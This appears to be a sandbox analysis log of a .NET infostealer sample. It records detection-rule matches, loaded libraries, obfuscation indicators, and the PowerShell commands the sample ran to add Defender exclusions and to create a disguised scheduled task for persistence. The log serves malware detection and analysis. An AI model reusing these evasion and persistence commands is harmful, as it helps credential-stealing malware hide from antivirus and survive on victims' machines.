                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D066E00_2_05D066E0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D062980_2_05D06298
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 0_2_05D062A80_2_05D062A8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_01879BEA9_2_01879BEA
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_01874AA09_2_01874AA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_01873E889_2_01873E88
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_0187CE889_2_0187CE88
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_018741D09_2_018741D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_068056C09_2_068056C0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06803F309_2_06803F30
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_0680BCE89_2_0680BCE8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_0680DCF09_2_0680DCF0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06809AB89_2_06809AB8
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06802AF09_2_06802AF0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06808B679_2_06808B67
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_068000409_2_06800040
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_06804FE09_2_06804FE0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeCode function: 9_2_068032279_2_06803227
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_0109E40010_2_0109E400
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_0612BC4010_2_0612BC40
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061266CF10_2_061266CF
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061266E010_2_061266E0
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_06126FB810_2_06126FB8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_061247C810_2_061247C8
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_06124C0010_2_06124C00
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 10_2_0612629810_2_06126298
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002B31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed54a4dfb-b711-44c1-af5f-04d55f847873.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed54a4dfb-b711-44c1-af5f-04d55f847873.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2025026137.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2023593017.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2032144320.0000000005630000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2032823086.0000000005F50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000000.00000002.2017591310.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3256233551.0000000001369000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3255739299.0000000000434000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed54a4dfb-b711-44c1-af5f-04d55f847873.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Binary or memory string: OriginalFilenameglVB.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cbe5e0.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TuZRpLi.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, c2bZQnG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, c2bZQnG.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, Q1L0K.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.3cf9000.8.raw.unpack, uo1UBaEHa.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, jnOEI4PSUDb1Xcqy8J.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, jnOEI4PSUDb1Xcqy8J.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/15@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File created: C:\Users\user\AppData\Roaming\TuZRpLi.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File created: C:\Users\user\AppData\Local\Temp\tmp8319.tmp
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | ReversingLabs: Detection: 18%
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Virustotal: Detection: 29%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe C:\Users\user\AppData\Roaming\TuZRpLi.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, windows.storage.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, iphlpapi.dll, dnsapi.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5630000.10.raw.unpack, LoginForm.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, DbTxFVYqKJRHOfF5An.cs | .Net Code: RmQu9xImOq System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Code function: 9_2_06803AD3 push ebx; retf 9_2_06803ADA
Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Static PE information: section name: .text entropy: 7.924266151976974
Source: TuZRpLi.exe.0.dr | Static PE information: section name: .text entropy: 7.924266151976974
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, h9XgJUrxZvKDBIOq0uq.cs | High entropy of concatenated method names: 'VeYLCNNu9W', 'MvVLoMT1Hp', 'O9dL9oHIaT', 'JWXLAPNcA7', 'KYZLfkTbaQ', 'EapLVWp47q', 'DjNL7ri8HE', 'BbbLR7vPYo', 'uUiLxT0FoZ', 'sbBLe8wfs2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, jnOEI4PSUDb1Xcqy8J.cs | High entropy of concatenated method names: 'GgEqlesy3j', 'BoOqn1g6Mo', 'sKCqKLgPlt', 'dIcqU6aIW8', 'FcJq4wYJZg', 'UJkq1d6ufp', 'tYRqZ5pmST', 'NLvqO14TCe', 'CBdq5VRVDQ', 'IXsqMnyEJS'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, Ics5XOqDoJJfpkWswl.cs | High entropy of concatenated method names: 'FIiT8cYOKL', 'sgoTtYIAcm', 'oeOTl5YB74', 'tE6TnACnhu', 'qD5THq6QvE', 'IB4TwIqn0M', 'STmTmY9pPA', 'IgUTGp9Oca', 'lTxTicXyrA', 'JDHTNnZBHj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe.5f50000.13.raw.unpack, lZ8uWIRiVRTulY9dLy.cs | High entropy of concatenated method names: 'iuAaA5vhp4', 'asaaV06jBc', 'cqpaR4BFWX', 'DDBaxepNou', 'KWlaTTuRwU', 'wFVavLYnER', 'W9PaB6lkRP', 'Oyfast38cl', 'RuaaLJaSdK', 'HWaaYayDpc'
